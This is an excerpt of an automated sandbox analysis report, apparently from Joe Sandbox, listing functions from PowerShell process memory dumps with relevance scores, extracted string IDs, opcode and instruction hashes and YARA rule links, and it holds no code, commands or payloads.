                                                                                                                                                                            • Instruction ID: 90ebf9efe1b7a0eae6161bec43fda68ffe97084afdaa2f4c64280b20ba54eb2a
                                                                                                                                                                            • Opcode Fuzzy Hash: fabca277706561b65ddb9189c1966e8ec1be349239a374135550dfe41123ec2e
                                                                                                                                                                            • Instruction Fuzzy Hash: 1D916AB4E00105DFDB14DFA8C541AAABBF2EF88315F14C0A9D845AB355DB36DD82CB61
                                                                                                                                                                            Function 07643E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-177832560
                                                                                                                                                                            • Opcode ID: 29fff56b1232038dee65cb86b7943cd425892670ff0aa2000cb1136367a85458
                                                                                                                                                                            • Instruction ID: 54527b0bf4de28c8d8c1158085b23784c8b9e1d4b307d3eb4e6ea04f1aa07f8c
                                                                                                                                                                            • Opcode Fuzzy Hash: 29fff56b1232038dee65cb86b7943cd425892670ff0aa2000cb1136367a85458
                                                                                                                                                                            • Instruction Fuzzy Hash: B3412AF2B011269BCF649E7AC94016FBBE5AF84210B14806AD817EB381DB31D901C7D5
                                                                                                                                                                            Function 08F92E78 Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-3012014280
                                                                                                                                                                            • Opcode ID: 32c42a3209336eb3ecece018f6541d89d0c16669fdc848f1a5b9a73377549c26
                                                                                                                                                                            • Instruction ID: 7fc3fa2d0975691a3027898b991d2d556432ce527572b997a6e82104619c6240
                                                                                                                                                                            • Opcode Fuzzy Hash: 32c42a3209336eb3ecece018f6541d89d0c16669fdc848f1a5b9a73377549c26
                                                                                                                                                                            • Instruction Fuzzy Hash: 922150B1F04205EFEF24DE79D58066AB7A6BB5421AF04806ED4A8CB259D731C941CBA1
                                                                                                                                                                            Function 07647FC0 Relevance: 3.1, Strings: 2, Instructions: 632COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl
                                                                                                                                                                            • API String ID: 0-3162476086
                                                                                                                                                                            • Opcode ID: 1c2cd6ff142d1f2018ef25a38a2cc08f8bc1ba0e75e253d74200df582f54d311
                                                                                                                                                                            • Instruction ID: b7523812d3e2474b14a55215751feba6817c90bc3597182f208969d2ea6d9e01
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c2cd6ff142d1f2018ef25a38a2cc08f8bc1ba0e75e253d74200df582f54d311
                                                                                                                                                                            • Instruction Fuzzy Hash: BE427DB4B012169FDB14CFA8C541EAABBB2EF84304F15C059E9069F395CB72ED41CB91
                                                                                                                                                                            Function 08F90EDF Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$Pi
                                                                                                                                                                            • API String ID: 0-1648799806
                                                                                                                                                                            • Opcode ID: c83ba42b73a7c25638afc01a28f2115bfe059e50124c6f6ce3a00808e78096de
                                                                                                                                                                            • Instruction ID: 0b726dae572b5777c00086ce8ceb9a0b95003f7dbbec5b5777f1ad5742e06aa0
                                                                                                                                                                            • Opcode Fuzzy Hash: c83ba42b73a7c25638afc01a28f2115bfe059e50124c6f6ce3a00808e78096de
                                                                                                                                                                            • Instruction Fuzzy Hash: 1F8128B4E00205DFDB14CF68C541A9ABBB2FF88315F15C0A9E845AB355DB36ED82CB61
                                                                                                                                                                            Function 08F90B80 Relevance: 2.6, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq
                                                                                                                                                                            • API String ID: 0-907361030
                                                                                                                                                                            • Opcode ID: c846d669a5ca02043c74c6966a607c071f3eff7be1a4f1192b67026d34567e0d
                                                                                                                                                                            • Instruction ID: 548d5974b6957ced7611e1ab3fc4c5cf3593d29586b548b2c3f3b80c52cad239
                                                                                                                                                                            • Opcode Fuzzy Hash: c846d669a5ca02043c74c6966a607c071f3eff7be1a4f1192b67026d34567e0d
                                                                                                                                                                            • Instruction Fuzzy Hash: FC414BB2F046158FDF255A78840177EBBA29FC1312B2480BFC585DB692EF35C841C7A1
                                                                                                                                                                            Function 08F90A9D Relevance: 2.6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq
                                                                                                                                                                            • API String ID: 0-907361030
                                                                                                                                                                            • Opcode ID: 082b20fdfb8b354cec34a78eaddc2b2d15ff7beda1c5485135a9300274fb1bee
                                                                                                                                                                            • Instruction ID: 49065ac80680adb35869bb09bf06ec45e0ebd3ad134e83085e559a481ea3fd8a
                                                                                                                                                                            • Opcode Fuzzy Hash: 082b20fdfb8b354cec34a78eaddc2b2d15ff7beda1c5485135a9300274fb1bee
                                                                                                                                                                            • Instruction Fuzzy Hash: 133148B3F00A04DBEF255EB4A40177DB352ABC0327B24806AD992DF681DF76C946C7A1
                                                                                                                                                                            Function 07643DE2 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $eq$$eq
                                                                                                                                                                            • API String ID: 0-2246304398
                                                                                                                                                                            • Opcode ID: acf183947ab649752e3a825c73da39f7c19443f09442e6038e05ef4f5201f884
                                                                                                                                                                            • Instruction ID: d03a7619d035f2c91368a4d138370f9f4785bf85bf364d9a5ae223aa37a2a7f2
                                                                                                                                                                            • Opcode Fuzzy Hash: acf183947ab649752e3a825c73da39f7c19443f09442e6038e05ef4f5201f884
                                                                                                                                                                            • Instruction Fuzzy Hash: DB21F7B6906397DFCB518F7AC5401AABFF0AF4621072941ABC85AFB382D330D945C795
                                                                                                                                                                            Function 07647E08 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: x.ek
                                                                                                                                                                            • API String ID: 0-2146835383
                                                                                                                                                                            • Opcode ID: 64936cad91c1a9df29137cbfd51931391d8eb0184d0652d06710a39052b310de
                                                                                                                                                                            • Instruction ID: b2b8e4d3a0ad37510676f1662269fc938a1b7bee6a4864c20988d9343b374508
                                                                                                                                                                            • Opcode Fuzzy Hash: 64936cad91c1a9df29137cbfd51931391d8eb0184d0652d06710a39052b310de
                                                                                                                                                                            • Instruction Fuzzy Hash: 703192B0B41114ABD714ABA8C911FAF7AA3EF85300F14C028E9026F3D5CF76AD818BD1
                                                                                                                                                                            Function 08F90B7F Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq
                                                                                                                                                                            • API String ID: 0-1552367303
                                                                                                                                                                            • Opcode ID: 687dc32cd4bcbb2c6aa58d42a6d5d3e021da3b4249e3a23fbefc25cadde0ccf7
                                                                                                                                                                            • Instruction ID: d0abcc099cc219d7013c237b0553a592e4e1266a250b3655d67a8c5ac4df0aa2
                                                                                                                                                                            • Opcode Fuzzy Hash: 687dc32cd4bcbb2c6aa58d42a6d5d3e021da3b4249e3a23fbefc25cadde0ccf7
                                                                                                                                                                            • Instruction Fuzzy Hash: 392138B2F00A01DBEF705E78950173E76A19FC0302F14407AC981EB681DF36C981C7A5
                                                                                                                                                                            Function 07647F9D Relevance: .5, Instructions: 483COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 894e0617d5798d8003e92196a864361e1f414f1460e4ae9a39679d99b191a5c8
                                                                                                                                                                            • Instruction ID: 6b4ac9f19bda9bdff07cc1093587277e83d363ff4fc4da424901878349e9e417
                                                                                                                                                                            • Opcode Fuzzy Hash: 894e0617d5798d8003e92196a864361e1f414f1460e4ae9a39679d99b191a5c8
                                                                                                                                                                            • Instruction Fuzzy Hash: 93126BB4A01216DFDB54CFA8C540EA9BBB2EF85304F15C059E906AB391C772ED82CB90
                                                                                                                                                                            Function 076445D8 Relevance: .5, Instructions: 469COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3d5cf2dfff49817149ce9506aab202249310249136296b0ea7d8ee0e1b36cc36
                                                                                                                                                                            • Instruction ID: d99135fe4fdebf5cbb3c58a77460afaf5da479772551a976b21a68580d9d1bbb
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d5cf2dfff49817149ce9506aab202249310249136296b0ea7d8ee0e1b36cc36
                                                                                                                                                                            • Instruction Fuzzy Hash: 29128DB4B002559FCB14CFA8C552F6ABBB2EF85304F14C069E9069B795CB72ED42CB91
                                                                                                                                                                            Function 08F82680 Relevance: .4, Instructions: 440COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521798286.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2be613ba4f2ef6d481077ffb7ea048473ebada1e8143880ac39d983cf7fa531a
                                                                                                                                                                            • Instruction ID: 6611fe5cd361a0d7adc4cbecb3b85663fba02a350f15b2cfce8b4dd7581e942d
                                                                                                                                                                            • Opcode Fuzzy Hash: 2be613ba4f2ef6d481077ffb7ea048473ebada1e8143880ac39d983cf7fa531a
                                                                                                                                                                            • Instruction Fuzzy Hash: A2124E74E05259DFCB05DFA8D494A9EBBB2FF88310F248159E845AB365C731ED82CB90
                                                                                                                                                                            Function 08F81120 Relevance: .4, Instructions: 434COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521798286.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8e9fe61cdc68a1d35b1c97ab6447d7e56888d20adea8d574494b86d5aedd8c42
                                                                                                                                                                            • Instruction ID: e77a2aae95aab136e334909266775a7215a8ba16c23379d14b8abd9cffac89cc
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e9fe61cdc68a1d35b1c97ab6447d7e56888d20adea8d574494b86d5aedd8c42
                                                                                                                                                                            • Instruction Fuzzy Hash: 98021E74A01219DFCB15DFA8D484A9EBBF2FF89310F248659E805AB355D731ED82CB90
                                                                                                                                                                            Function 08F820C0 Relevance: .4, Instructions: 426COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521798286.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8552019290dfd7d95f5fac42131df851efdad870eddcd0529ef82e724fab763b
                                                                                                                                                                            • Instruction ID: 076798c206488af05b90c518a2797218c9a7878796f72e80032217134338865d
                                                                                                                                                                            • Opcode Fuzzy Hash: 8552019290dfd7d95f5fac42131df851efdad870eddcd0529ef82e724fab763b
                                                                                                                                                                            • Instruction Fuzzy Hash: B9022D74A01219DFDB05DFA8D894AADBBF2FF88310F248159E815AB365C731ED91CB90
                                                                                                                                                                            Function 076445BE Relevance: .4, Instructions: 420COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dd6064797057a84505f7a8b946ea8fd44f65d52d92c32254c594e0a771d87d61
                                                                                                                                                                            • Instruction ID: 6886869415de6104877302d54238e454418d48b8c1f0dbb24ccad1f28b2dc9db
                                                                                                                                                                            • Opcode Fuzzy Hash: dd6064797057a84505f7a8b946ea8fd44f65d52d92c32254c594e0a771d87d61
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D026CB4A01255DFD710CFA8C592FA9BBB2AF85304F15C059E906AB391CB72ED42CB91
                                                                                                                                                                            Function 08F82631 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521798286.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 678d5c8d2d01609fa9ac3a2430f3876b6080be84961c12536ff6085c62f0c428
                                                                                                                                                                            • Instruction ID: 398f0df7bf1233318217bdc1a017bc674a8f9b286d63254984ae7e0ba665f8af
                                                                                                                                                                            • Opcode Fuzzy Hash: 678d5c8d2d01609fa9ac3a2430f3876b6080be84961c12536ff6085c62f0c428
                                                                                                                                                                            • Instruction Fuzzy Hash: A7518074A05645CFCB06DF6DC8909AEBBB2EF49314F288299D851AB3A1D335AC41CB50
                                                                                                                                                                            Function 08F80448 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521798286.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3f3b266ce8ffa0b14a5f638e33f6798b82171a12307a59492414d3402165bce4
                                                                                                                                                                            • Instruction ID: 72b939ccc7503e3bc8295305dc90ce0e6dc33aeb8b2c984e4a7ab4b3a6aae8ec
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f3b266ce8ffa0b14a5f638e33f6798b82171a12307a59492414d3402165bce4
                                                                                                                                                                            • Instruction Fuzzy Hash: 36519F74B00609CFCB05EBB9D8406AEBBF6FFC8310F548469D405AB366DB349D468BA0
                                                                                                                                                                            Function 07642052 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 922f4ecb2854d785aaaad9c2a030488e2daeb4ebce9a5c63400197bc9a457387
                                                                                                                                                                            • Instruction ID: f9145fb70253d5985969491081dea026dbd3eecd98d2ddc82387dc4b896cc257
                                                                                                                                                                            • Opcode Fuzzy Hash: 922f4ecb2854d785aaaad9c2a030488e2daeb4ebce9a5c63400197bc9a457387
                                                                                                                                                                            • Instruction Fuzzy Hash: A6414AF1A00202DFCB228F74896166A7BB2BF85250F38C196FA069F791D735DD45C7A2
                                                                                                                                                                            Function 08F820B1 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521798286.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 565ace45019f1de544fb5aa92bdc77294ec4137ed01ec76046d9472a61f90180
                                                                                                                                                                            • Instruction ID: bb59789dc81cea83a9c0c033b88a1b723669d31df0b086a54ce41514d943e3a4
                                                                                                                                                                            • Opcode Fuzzy Hash: 565ace45019f1de544fb5aa92bdc77294ec4137ed01ec76046d9472a61f90180
                                                                                                                                                                            • Instruction Fuzzy Hash: 15410A74A00519CFCB05DF9CC984AAEB7B2FF48310F258258E915A73A4D735EC51CBA0
                                                                                                                                                                            Function 07648DE0 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 07304045b94b68bfbc2e05caa5ca9a27b31aecb584b46f5628612e7e877af37c
                                                                                                                                                                            • Instruction ID: bb830042b252b90f791dcbcb9e9c4b2e66ae8136fdad1042a3562dc34f9e2eb7
                                                                                                                                                                            • Opcode Fuzzy Hash: 07304045b94b68bfbc2e05caa5ca9a27b31aecb584b46f5628612e7e877af37c
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F3107F1B102139FCB219A7894027BABBE29BD1340F08C075D506CB741EB36D981C795
                                                                                                                                                                            Function 07648DC2 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c9a8b228380be8354fdead63038ff42589b3b69fbb53db22233035d29d020f1f
                                                                                                                                                                            • Instruction ID: e645e4a95817ca811ef2baaa7cf782608e7bfe7c9d57c8cf1b74763c0544a2e9
                                                                                                                                                                            • Opcode Fuzzy Hash: c9a8b228380be8354fdead63038ff42589b3b69fbb53db22233035d29d020f1f
                                                                                                                                                                            • Instruction Fuzzy Hash: 1F2136F1A142039FCF219F348501779BBF29F82344F0980A5D9069B392E73ADA91D7A6
                                                                                                                                                                            Function 08F80800 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521798286.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ae602cd2ea9903cd875ae7f13fc3f14047b2736821f1e6258a5daf92332f6591
                                                                                                                                                                            • Instruction ID: f02129c38e6caaa6d4473d250cc0a76e0347fa71ffeaaf62fd3ee4fc6b4db6ef
                                                                                                                                                                            • Opcode Fuzzy Hash: ae602cd2ea9903cd875ae7f13fc3f14047b2736821f1e6258a5daf92332f6591
                                                                                                                                                                            • Instruction Fuzzy Hash: 4A313874A00509DFCB14DF99C5849AAFBF1FF88310B258699D959A7751C731EC81CB90
                                                                                                                                                                            Function 08F817DC Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521798286.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 13045d65870b46e6014fe6f53670b3af12dde5578b0981ba9ca700a5f069ce1c
                                                                                                                                                                            • Instruction ID: 96c017718c57e2fa9bdb684fabf30d7efbfaa21cedca04900b403b6b83f6bc2f
                                                                                                                                                                            • Opcode Fuzzy Hash: 13045d65870b46e6014fe6f53670b3af12dde5578b0981ba9ca700a5f069ce1c
                                                                                                                                                                            • Instruction Fuzzy Hash: 4FF03075A00118EFCB15DF8CD8808AEFB76FF88324B248159E914A32A0C7329C52DB50

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Function 0764B61A Relevance: 19.2, Strings: 15, Instructions: 471COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$4'eq$4'eq$4'eq$4'eq$Pi$Pi$tLfk$tLfk$x.ek$-ek
                                                                                                                                                                            • API String ID: 0-2421198319
                                                                                                                                                                            • Opcode ID: ae6ead5daf1e1285045ece627d5c333a58a3622c0936a13441e73200d6d51be3
                                                                                                                                                                            • Instruction ID: 9b20857d24d3b5f672c7fc59dd954166dd631f76486bae9a432bbaefac7b4072
                                                                                                                                                                            • Opcode Fuzzy Hash: ae6ead5daf1e1285045ece627d5c333a58a3622c0936a13441e73200d6d51be3
                                                                                                                                                                            • Instruction Fuzzy Hash: 932230B4A01218DFDB25DF68C951BDABBB2EF85304F108499D5096B785CB31EE81CF91
                                                                                                                                                                            Function 0764F188 Relevance: 19.0, Strings: 15, Instructions: 299COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$84rl$84rl$84rl$84rl$tPeq$tPeq$tPeq$tPeq$$eq$(kq$(kq$(kq$(kq
                                                                                                                                                                            • API String ID: 0-2423997558
                                                                                                                                                                            • Opcode ID: ba4588254430bd79a38ea846d37f212245a9088296b13dec38d138696bc7d87b
                                                                                                                                                                            • Instruction ID: ee5854ff1fa2343998c665230d36d3239de785ce9eb71087a1f7c44f8ce40bf3
                                                                                                                                                                            • Opcode Fuzzy Hash: ba4588254430bd79a38ea846d37f212245a9088296b13dec38d138696bc7d87b
                                                                                                                                                                            • Instruction Fuzzy Hash: C5A1C7B1B101059FCB25DF68D505AEBBBA6FF84310F298465E8069B391DB31DD41C7A1
                                                                                                                                                                            Function 0764EE38 Relevance: 16.5, Strings: 13, Instructions: 240COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
